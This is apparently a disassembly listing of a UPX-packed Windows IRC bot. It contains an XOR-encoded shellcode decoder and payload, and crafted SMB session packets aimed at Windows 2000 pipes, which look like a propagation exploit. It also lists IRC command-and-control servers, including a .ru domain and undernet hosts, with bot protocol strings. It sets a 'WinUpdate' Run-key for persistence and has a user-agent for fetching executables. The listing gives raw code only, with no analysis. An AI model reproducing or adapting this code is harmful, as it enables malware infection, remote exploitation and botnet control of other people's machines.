jb short loc_4036B0
loc_40369C: ; CODE XREF: sub_403690+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_40369C
loc_4036B0: ; CODE XREF: sub_403690+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_403690 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4036C0 proc near ; CODE XREF: sub_401C90+44�p
; sub_401C90+71�p ...
jmp dword_4010D8
sub_4036C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4036C6 proc near ; CODE XREF: sub_401E10+14B�p
; sub_401E10+1D5�p ...
jmp dword_4010D4
sub_4036C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4036CC proc near ; CODE XREF: SEH_4022A0+5�j
; SEH_402590+5�j
jmp dword_4010D0
sub_4036CC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
SEH_4022A0 proc near ; DATA XREF: sub_4022A0+5�o
mov eax, offset dword_403708
jmp sub_4036CC
SEH_4022A0 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-0BCh]
jmp loc_401DF0
; =============== S U B R O U T I N E =======================================
SEH_402590 proc near ; DATA XREF: sub_402590+5�o
mov eax, offset dword_403760
jmp sub_4036CC
SEH_402590 endp
; ---------------------------------------------------------------------------
align 4
dword_403708 dd 19930520h, 2, 403728h, 1, 403738h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 403750h, 4 dup(0)
dd offset sub_402459
dword_403760 dd 19930520h, 1, 403780h, 5 dup(0) dd 0FFFFFFFFh, 4036F0h, 21Eh dup(0)
dword_404000 dd 206h, 2400h, 31415352h, 800h, 10001h, 826711F5h, 446D80B4h
; DATA XREF: sub_401170+42�o
dd 3B493FBCh, 0BC974723h, 0E710B644h, 0BB46041Dh, 0D4519A52h
dd 4D6FCE6Ch, 47CACF3Fh, 17DAB6AAh, 0E985B846h, 8750550Ch
dd 62D725C6h, 0B756274Ch, 0C5C66068h, 56054E02h, 5C435BBAh
dd 0D43965E6h, 0B10DD7A2h, 0ADD37790h, 0C8099091h, 389683CAh
dd 0DDA2D0C0h, 28132714h, 0C3C8E8D4h, 0DE4716DAh, 3A6237CDh
dd 6C1650E2h, 8662EE76h, 0B8C8FCB3h, 35E03A95h, 0CDDF06B7h
dd 0B4042653h, 23AF2C3Ch, 2AD55D63h, 87D89F05h, 86AA1D66h
dd 40340516h, 1F1390A7h, 538D1015h, 0A2658B55h, 709EC36Ch
dd 0AF03B0D4h, 0D054113Ch, 0C05DEE8Ch, 0D7652B6Eh, 0A772AC6Eh
dd 0B851FA87h, 3474E2DEh, 1D25E34Ah, 0A35A706Ah, 89EF64E9h
dd 0E3750E7h, 0F3A618FCh, 4DC41C20h, 74B24DB0h, 0D04ABB3h
dd 0EF180298h, 0D25EE9A6h, 7308F74Eh, 0D9486CD7h, 0D37CF54Bh
dd 1356C476h, 0E9DC87DDh
aCont db 'cont',0 ; DATA XREF: sub_401150+3�o
align 10h
loc_404120: ; DATA XREF: sub_4016E0+25C�o
; sub_4016E0+273�o ...
jmp short loc_404149
; ---------------------------------------------------------------------------
word_404122 dw 3412h ; DATA XREF: UPX0:004032E1�w
dword_404124 dd 0ABAAAAD5h ; ---------------------------------------------------------------------------
loc_404128: ; CODE XREF: UPX0:loc_404149�p
pop ebp
xor ecx, ecx
mov cx, 21Fh
lea esi, [ebp+5]
mov edi, esi
loc_404134: ; CODE XREF: UPX0:00404145�j
mov al, [esi]
cmp al, 99h
jnz short loc_40413F
inc esi
mov al, [esi]
sub al, 30h
loc_40413F: ; CODE XREF: UPX0:00404138�j
inc esi
xor al, 99h
mov [edi], al
inc edi
loop loc_404134
jmp short near ptr loc_404152+1
; ---------------------------------------------------------------------------
loc_404149: ; CODE XREF: UPX0:loc_404120�j
call loc_404128
bound esp, cs:[ebp+67h]
loc_404152: ; CODE XREF: UPX0:00404147�j
db 2Eh
jno short near ptr dword_404000+0E8h
cdq
leave
cdq
leave
cdq
leave
adc bh, ch
mov ebp, 9916FD91h
leave
sal dword ptr [edx+68h], 0AAh
inc edx
std
db 66h
stosb
std
adc [edx-6700E3ECh], bh
cdq
leave
cdq
leave
leave
rep cwde
icebp
cwde
cdq
leave
xchg bl, [ecx-67EC8E37h]
cdq
leave
cdq
leave
nop
pop edi
retf
; ---------------------------------------------------------------------------
dw 9237h
dd 0B91C9659h, 99C99998h, 997518C9h, 0C9999BC9h, 0F1CDC999h
dd 0C9999898h, 0DC71C999h, 99C99998h, 47ECE4C9h, 995D1854h
dd 0C9999BC9h, 9FF3C999h, 9BF398F3h, 9998A971h, 0F3C999C9h
dd 1065E368h, 9998E71Ch, 1AC999C9h, 5EFFD975h, 999BBD9Dh
dd 0DC12FFC9h, 0DD10FF4Dh, 0DC129BBDh, 3333AC4Fh, 0DD103333h
dd 0E5149DBDh, 323291BDh, 89F34512h, 0E72C66CAh, 99C99998h
dd 996B71C9h, 99C999C9h, 416713C9h, 0D95D1A74h, 1C965992h
dd 99C99934h, 0F3C999C9h, 0C999F19Dh, 99C99989h, 0C999F1C9h
dd 9998C999h, 0C999F3C9h, 0C9996171h, 0C999C999h, 0F0E3F367h
dd 98EF1C10h, 0C999C999h, 0F1C999F3h, 0C999C999h, 0C9C99998h
dd 98E72C66h, 0C999C999h, 0C9992A71h, 0C999C999h, 97C0E86Fh
dd 669BF3C9h, 9998E72Ch, 71C999C9h, 99C99938h, 0D8C999C9h
dd 0B2D5E5C1h, 0F3C9C959h, 0F1C9C99Bh, 0C999C999h, 14D9C999h
dd 9998F404h, 0CAC999C9h, 0C9993571h, 0C999C999h, 9161688Dh
dd 98F01C10h, 0C999C999h, 66611AC3h, 12CDA7EDh, 0C999F35Dh
dd 2C66CBC9h, 0C99998EFh, 2C66C999h, 0C99998F0h, 1D71C999h
dd 0C999C999h, 485AC999h, 66C096A6h, 9998F02Ch, 71C999C9h
dd 99C999EDh, 4CC999C9h, 0F3EBA729h, 0F404149Ch, 99C99998h
dd 0FB71CAC9h, 0C999C999h, 0F434C999h, 99F37126h, 99CE71C9h
dd 99C999C9h, 133BF9C9h, 99ABECEFh, 2 dup(99C999C9h), 0FEC5B7C9h
dd 0E1FCB7F6h, 99C999FCh, 5 dup(99C999C9h), 0CAC999C9h
dd 0E9FCFCF5h, 0FCF2C999h, 0F5FCF7EBh, 0C999ABAAh, 0AAF934C7h
dd 2A2DB459h, 0ACC91E66h, 0A5B7E7E6h, 0B8BD9CC9h, 0CDC9829Dh
dd 0C9999271h, 0C999C999h, 513519BFh, 95BDFD14h, 0C791720Ah
dd 0C871F934h, 0C999C999h, 0D212C999h, 80D512A5h, 0AA529AE1h
dd 2A8D146Fh, 12B9C89Ah, 0AA4A9A8Bh, 9E595859h, 19DB9BABh
dd 0ECC999A3h, 0BDDDA26Ch, 0DF9EED85h, 0EB81E8A2h, 0C8125544h
dd 964A9ABDh, 12EB8D2Eh, 5A9A85D8h, 9A099D12h, 0BDDD105Ah
dd 1C10F885h, 0C99998E3h, 4966C999h, 0FEFD7F66h, 99A98712h
dd 95C212C9h, 1285C212h, 91C21282h, 0F7FCB75Ah, 0B7FDh
dword_4043F4 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_4016E0+1A2�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_404480 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4016E0+1D9�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 4
dd 0
dword_40452C dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4016E0+20A�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_40460C dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4016E0+95�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
db 43h, 0, 24h
dword_404663 dd 3F000000h dword_404667 dd 3F3F3F3Fh byte_40466B db 0 ; DATA XREF: sub_4016E0+F7�r
align 10h
dword_404670 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4016E0+307�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4046DC dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4016E0+338�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_404780 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4016E0+51B�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_404800 dd offset loc_401495 ; DATA XREF: sub_4016E0+54C�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707A+2
dd 1, 0
dd 1, 0
dd offset loc_40707A+2
dd 1, 0
dd 1, 0
dd offset loc_40707A+2
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_404894 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4016E0+373�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_404900 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4016E0+3A6�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_404974 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 4 dup(0)
dd 586E6957h, 72502050h, 6Fh, 0Ah dup(0)
dword_404A38 dd 1004600h dd 1, 326E6957h, 7250206Bh, 6Fh, 0Ah dup(0)
dword_404A74 dd 7515123Ch dd 2, 326E6957h, 5341206Bh, 0Bh dup(0)
dd 751C123Ch, 0Fh dup(0)
dword_404AF0 dd 6EB06EBh align 8
dword_404AF8 dd 73255C5Ch, 6370695Ch, 24hdword_404B04 dd 1CEC8166h dword_404B08 dd 0E4FF07h off_404B0C dd offset aMoscowAdvokat_ ; DATA XREF: sub_402590:loc_402647�r
; sub_402590+140�r
; "moscow-advokat.ru"
dd offset aGraz_at_eu_und ; "graz.at.eu.undernet.org"
dd offset aFlanders_be_eu ; "flanders.be.eu.undernet.org"
dd offset aCaen_fr_eu_und ; "caen.fr.eu.undernet.org"
dd offset aBrussels_be_eu ; "brussels.be.eu.undernet.org"
dd offset aLosAngeles_ca_ ; "los-angeles.ca.us.undernet.org"
dd offset aWashington_dc_ ; "washington.dc.us.undernet.org"
dd offset aLondon_uk_eu_u ; "london.uk.eu.undernet.org"
dd offset aLia_zanet_net ; "lia.zanet.net"
dd offset aGaspode_zanet_ ; "gaspode.zanet.org.za"
dd offset dword_404B38
dword_404B38 dd 2E637269h, 2E72616Bh, 74656EhaGaspode_zanet_ db 'gaspode.zanet.org.za',0 ; DATA XREF: UPX0:00404B30�o
align 4
aLia_zanet_net db 'lia.zanet.net',0 ; DATA XREF: UPX0:00404B2C�o
align 4
aLondon_uk_eu_u db 'london.uk.eu.undernet.org',0 ; DATA XREF: UPX0:00404B28�o
align 4
aWashington_dc_ db 'washington.dc.us.undernet.org',0 ; DATA XREF: UPX0:00404B24�o
align 4
aLosAngeles_ca_ db 'los-angeles.ca.us.undernet.org',0 ; DATA XREF: UPX0:00404B20�o
align 4
aBrussels_be_eu db 'brussels.be.eu.undernet.org',0 ; DATA XREF: UPX0:00404B1C�o
aCaen_fr_eu_und db 'caen.fr.eu.undernet.org',0 ; DATA XREF: UPX0:00404B18�o
aFlanders_be_eu db 'flanders.be.eu.undernet.org',0 ; DATA XREF: UPX0:00404B14�o
aGraz_at_eu_und db 'graz.at.eu.undernet.org',0 ; DATA XREF: UPX0:00404B10�o
aMoscowAdvokat_ db 'moscow-advokat.ru',0 ; DATA XREF: UPX0:off_404B0C�o
align 4
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_401C90+1E�o
align 10h
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_401C90+B�o
align 4
aUserS8S db 'USER %s 8 * :%s',0Dh,0Ah,0 ; DATA XREF: sub_401E10+1F2�o
align 10h
aAlready db 'already',0 ; DATA XREF: sub_401E10+145�o
; sub_401E10+1CF�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_401E10+E0�o
; sub_401E10+16E�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_401E10+A2�o
align 10h
aPongS db 'PONG%s',0Dh,0Ah,0 ; DATA XREF: sub_402090+5A�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_402090+D�o
; sub_402120+B2�o
align 4
a451 db '451',0 ; DATA XREF: sub_402120+8C�o
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_402120+15�o
align 4
aQuitS db 'QUIT %s',0Dh,0Ah,0 ; DATA XREF: sub_402230+28�o
align 10h
aYo db 'yo!',0 ; DATA XREF: sub_4022A0+44�o
aCool db 'cool!',0 ; DATA XREF: sub_4022A0+3D�o
align 4
aHehe db 'hehe',0 ; DATA XREF: sub_4022A0+36�o
align 4
aHi db 'hi :)',0 ; DATA XREF: sub_4022A0+2F�o
align 4
aPrivmsgSS db 'PRIVMSG %s %s',0Dh,0Ah,0 ; DATA XREF: sub_402480+51�o
aQ: ; DATA XREF: sub_402590+E0�o
; sub_4028D0+175�o
unicode 0, <q>,0
a_exe db '.exe',0 ; DATA XREF: sub_402790+71�o
; sub_403460+4B�o
align 4
asc_404D18: ; DATA XREF: sub_402790+4B�o
; sub_403460+57�o
unicode 0, <\>,0
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_402790+11�o
align 10h
aJoin db 'JOIN',0 ; DATA XREF: sub_4028D0+1AC�o
align 4
aDD5 db '%d,%d,5',0 ; DATA XREF: sub_4028D0+152�o
aI: ; DATA XREF: sub_4028D0+135�o
unicode 0, <i>,0
a1 db '-1',0 ; DATA XREF: sub_4028D0+111�o
align 4
asc_404D68: ; DATA XREF: sub_4028D0+E2�o
unicode 0, <|>,0
aE: ; DATA XREF: sub_4028D0+A7�o
unicode 0, <e>,0
aUterm5 db 'uterm5',0 ; DATA XREF: UPX0:00402EA4�o
align 4
aU2 db 'u2',0 ; DATA XREF: UPX0:00402E99�o
align 4
aR10 db 'r10',0 ; DATA XREF: UPX0:00402E8E�o
aGo_exe db 'go.exe',0 ; DATA XREF: UPX0:00402E6C�o
align 4
aU db '-u',0 ; DATA XREF: UPX0:00402E52�o
align 4
asc_404D8C db 0Dh,0Ah,0 ; DATA XREF: sub_402F80+1A2�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_402F80+13D�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_403460+97�o
; sub_403540+29�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_403460+92�o
; sub_403540+24�o
align 10h
dd 5 dup(0)
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_403540+55�o
; sub_403540+9A�o ...
aServer db 'Server',0 ; DATA XREF: sub_403540+50�o
; sub_403540+95�o ...
align 4
a1_0: ; DATA XREF: sub_403540+4B�o
unicode 0, <1>,0
dd 7 dup(0)
dword_404E38 dd 40h dup(0) ; sub_4028D0+E7�o ...
dword_404F38 dd 0 ; sub_4028D0+181�r ...
dword_404F3C dd 0 ; sub_4028D0+58�r ...
dword_404F40 dd 8 dup(0) ; sub_4028D0+11�o
dword_404F60 dd 0 ; sub_4028D0+10C�w
dword_404F64 dd 0 ; sub_402CF0+6F�w
dword_404F68 dd 0 ; UPX0:00402CC6�o ...
dword_404F6C dd 0 ; sub_402CF0+58�w ...
dword_404F70 dd 84h ; sub_403460+A6�r
dword_404F74 dd 8 dup(0) ; sub_402F80+174�o
dword_404F94 dd 0 ; UPX0:004032D2�r
dword_404F98 dd 400000h dword_404F9C dd 0 ; sub_4031F0+71�o ...
dword_404FA0 dd 0 ; sub_403540+33�w ...
align 80h
UPX0 ends
; Section 2. (virtual address 00005000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00005000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 405000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_405000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:00406F41�o
dd 61757472h, 6C6C416Ch, 100636Fh, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 47010063h, 6F4D7465h, 656C7564h, 646E6148h, 41656Ch
dd 74654701h, 6D6D6F43h, 4C646E61h, 41656E69h, 65440100h
dd 6574656Ch, 656C6946h, 43010041h, 74616572h, 74754D65h
dd 417865h, 74654701h, 75646F4Dh, 6946656Ch, 614E656Ch
dd 41656Dh, 74654701h, 656C6946h, 657A6953h, 65520100h
dd 69466461h, 100656Ch, 65746E49h, 636F6C72h, 4964656Bh
dd 6572636Eh, 746E656Dh, 736C0100h, 70637274h, 1004179h
dd 54746547h, 436B6369h, 746E756Fh, 65470100h, 73614C74h
dd 72724574h, 100726Fh, 74737953h, 69546D65h, 6F54656Dh
dd 656C6946h, 656D6954h, 65470100h, 73795374h, 546D6574h
dd 656D69h, 6F6C4301h, 61486573h, 656C646Eh, 72570100h
dd 46657469h, 656C69h, 65724301h, 46657461h, 41656C69h
dd 736C0100h, 70637274h, 416E79h, 74655301h, 72727543h
dd 44746E65h, 63657269h, 79726F74h, 47010041h, 79537465h
dd 6D657473h, 65726944h, 726F7463h, 1004179h, 74697845h
dd 65726854h, 1006461h, 45746553h, 746E6576h, 61570100h
dd 6F467469h, 6E695372h, 4F656C67h, 63656A62h, 43010074h
dd 74616572h, 72685465h, 646165h, 65724301h, 45657461h
dd 746E6576h, 6C010041h, 6C727473h, 416E65h, 656C5301h
dd 1007065h, 7274736Ch, 41746163h, 78450100h, 72507469h
dd 7365636Fh, 6C010073h, 63727473h, 41706Dh, 65724301h
dd 50657461h, 65636F72h, 417373h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0D000h, 5F5F0100h, 46787843h
dd 656D6172h, 646E6148h, 72656Ch, 72747301h, 727473h, 72747301h
dd 726863h, 61727301h, 100646Eh, 646E6172h, 0E90000h, 0E80000h
dd 77010000h, 69727073h, 4166746Eh, 0F40000h, 0F00000h
dd 49010000h, 7265746Eh, 4F74656Eh, 556E6570h, 416C72h
dd 746E4901h, 656E7265h, 61655274h, 6C694664h, 49010065h
dd 7265746Eh, 4F74656Eh, 416E6570h, 6E490100h, 6E726574h
dd 65477465h, 6E6F4374h, 7463656Eh, 74536465h, 657461h
dd 10000h, 10400h, 73FF00h, 0FF0008FFh, 6FFF0039h, 0BFF00h
dd 0FF0034FFh, 0CFF0012h, 4FF00h, 0FF0017FFh, 2FF0009h
dd 0DFF00h, 0FF0001FFh, 3FF0016h, 10FF00h, 13FFh, 0
dd 4550h, 2014Ch, 40AD17DAh, 2 dup(0)
dd 10F00E0h, 6010Bh, 2E00h, 1000h, 0
dd 2E30h, 1000h, 4000h, 400000h, 1000h, 200h, 4, 0
dd 4, 0
dd 5000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 3788h, 8Ch, 14h dup(0)
dd 1000h, 150h, 6 dup(0)
dd 7865742Eh, 74h, 2D86h, 1000h, 2E00h, 400h, 3 dup(0)
dd 0E0040020h, 7461642Eh, 61h, 0FA4h, 4000h, 1000h, 3200h
dd 3 dup(0)
dd 0C0000040h, 4000h, 3964h, 43ECh, 54EB38FDh, 0B4AE391Ah
dd 1DBEC87Fh, 16F86C87h, 24C0D18Bh, 1C2BCA08h, 0D0AC38Eh
dd 26BD50C2h, 71CD708Dh, 40256390h, 4638A10Fh, 6DBB0B2Ah
dd 89252673h, 0F1730CDh, 441357BEh, 2E098D84h, 0B0150441h
dd 5EE25095h, 0FF30A9h, 0F2C09FBh, 46706868h, 233D91FCh
dd 2D024D1Ch, 1E30DCA0h, 8F8403B8h, 0E52B301Ch, 0D70EC3C7h
dd 1A22A884h, 1E4894DDh, 0D776F6EEh, 0D64D614Ch, 0D932D6B9h
dd 257CCEBBh, 0ABB81654h, 0A5F31D50h, 96FC8EEAh, 321C66h
dd 61251C49h, 647BE6FCh, 973528E7h, 568C02h, 4F6C9019h
dd 2F50B19Eh, 30587421h, 148D5515h, 0DD20A136h, 0EE7B388Ah
dd 156B4490h, 84DC69CBh, 6160E26Fh, 4B0CA749h, 0DE036BB9h
dd 2D2E1E1Dh, 0DF4A746Eh, 8A4DCFBFh, 1263250h, 0ADD249D9h
dd 7822B981h, 684AD30Fh, 0E99A60Fh, 0A70F1639h, 0CC6972A8h
dd 41F06D6Dh, 9C6D893Fh, 0AE0AC512h, 0EA0365Bh, 130D52FFh
dd 12EB3C86h, 65F12FFFh, 8A377AD9h, 448A048Ch, 0C910064Eh
dd 2C6FB7Ch, 150DAC3Dh, 14B9E87Ch, 0CE76CB2h, 0FDC66883h
dd 0AB66AE06h, 2321BB1Ch, 49251827h, 0E9B09EBh, 0B9C3E472h
dd 4780A71Fh, 1F41534h, 47239D7Bh, 15B40788h, 0F1D91B0Ah
dd 0D824E1E4h, 661D8400h, 49210CF8h, 5B19DAECh, 81AC223Bh
dd 5218364h, 0A155A612h, 55E0CC5Fh, 5B5F2FA2h, 0B9EC9042h
dd 8214F444h, 450D0AC6h, 6F77E24Eh, 8EBE4A38h, 60C08C3Dh
dd 0F60C254Ch, 44BE15A4h, 0CE46DF12h, 88B2812h, 7DFF854Ch
dd 51E962D3h, 8A1AC7FBh, 2FD7FE5Ch, 1303ABF3h, 0BC263C47h
dd 971BA4DEh, 0B8C42F89h, 97C12B0Ch, 0F7995F98h, 344DFF9h
dd 448A781Bh, 0C338A514h, 4AE728CAh, 2C7BAC86h, 85891C28h
dd 8A5FED7Dh, 90080CC3h, 7FFD5C00h, 102354D1h, 5D8A181Dh
dd 74DB8400h, 17D4574Dh, 1496D6DBh, 149188D9h, 660B45F7h
dd 0FFA3A0D7h, 5A8C0C64h, 7BBB6747h, 61FB80FBh, 7A040B7Ch
dd 83AB067Fh, 410F61EEh, 906C7D1Fh, 7545415Ah, 691F88BFh
dd 0B82843C3h, 0F707A947h, 8B649E21h, 2735F57h, 0DD2C4689h
dd 5AAC3461h, 6A23048Fh, 0FC19BBF5h, 4E8D5027h, 44A75104h
dd 5856890Ch, 46AC25Eh, 3F8EAF57h, 0E15C229Ah, 0C25BF330h
dd 5C26992Ch, 0EE7F8142h, 0C1432BD5h, 1E489E1Eh, 33160B6Ch
dd 1B375C67h, 6E0D66DCh, 5838D8BFh, 15607E90h, 6A125164h
dd 7B419F0h, 568B048Eh, 1347035Ch, 667A16D8h, 0EFFE6216h
dd 0CCD8B5ACh, 0D85C30E4h, 9B77B9A9h, 8F0D42A4h, 0C584F389h
dd 0DAE7EA1Eh, 0CEC456DBh, 231B04C6h, 0E28C1062h, 23FDF6C4h
dd 1B9D096Ah, 0C1572D1Ah, 80F86F13h, 6828E252h, 0D5F84CA4h
dd 9B55B175h, 64158751h, 6E6D4C9Eh, 519E1F02h, 54AC6A5Bh
dd 4E8C14CEh, 65228233h, 7F74AD91h, 98685723h, 0C37513Dh
dd 9E4DEA77h, 6BA55254h, 0ED6B1CA1h, 499637BDh, 5052B61Eh
dd 84D8DAD8h, 432CD50Eh, 2FBC01B6h, 0C1841DF6h, 90E7BA52h
dd 8B72A3A2h, 2EC2597Ch, 0B168008Ah, 50B358C7h, 57D55701h
dd 79308D7Eh, 14529E46h, 0D8325044h, 0F24CC876h, 468D528Ch
dd 0C984A725h, 80444Eh, 6E93901Eh, 85514E89h, 0CF85FF76h
dd 2800D535h, 526E8954h, 0C2C95711h, 494F7C84h, 901D4E10h
dd 56836C87h, 1C755251h, 0D498E018h, 0B9E5502Ah, 1FBC3BBAh
dd 0C24CDBA5h, 0A227370Ch, 0AD62E02Bh, 239BA352h, 2375202Ch
dd 83BF2C61h, 1ACB0190h, 68018E60h, 83BFA6BCh, 74C1AFC6h
dd 8D98EE61h, 0CF83E570h, 486DED61h, 117E637Ah, 4906D4Ah
dd 68F8C199h, 0FC563DB5h, 0F424BA8Dh, 5270E8DEh, 0A4E7B068h
dd 937B70E7h, 0E3D77B67h, 98BD7843h, 0D86D84D1h, 292C8B4Bh
dd 8DDF3D82h, 5697340Bh, 0C8685357h, 0D3494CF1h, 0B891DB30h
dd 0CD73E52h, 1C86F081h, 0AB422014h, 142E0A11h, 9062142h
dd 0E6BC6432h, 562C767Ah, 7C9C98C4h, 3FA7417h, 0A486422Ch
dd 25BCF27Bh, 284D0451h, 236A706Ch, 205F3049h, 0ECB7484Ah
dd 22B1AEFh, 0C842A75Ch, 454A0FEFh, 9EA5E9Eh, 837C8329h
dd 83407E0h, 0B1BDCB70h, 0F1FE2C1Ah, 90D46857h, 6DD21C74h
dd 24D91452h, 0C96325B2h, 5E893928h, 0BD64817Fh, 0EC5ED060h
dd 0E068FF6Ah, 21FBDB36h, 0A1641B6Eh, 2589644Eh, 0FF348707h
dd 4D308591h, 6589F178h, 0E87589F0h, 6E4723C7h, 0F4D845EEh
dd 0ECDC0678h, 2DE4E4E0h, 0E0986F74h, 0EC4589DBh, 0FE13C76Bh
dd 28FEE761h, 85893203h, 1CB809C4h, 0F0CB276Ch, 4D48A09Eh
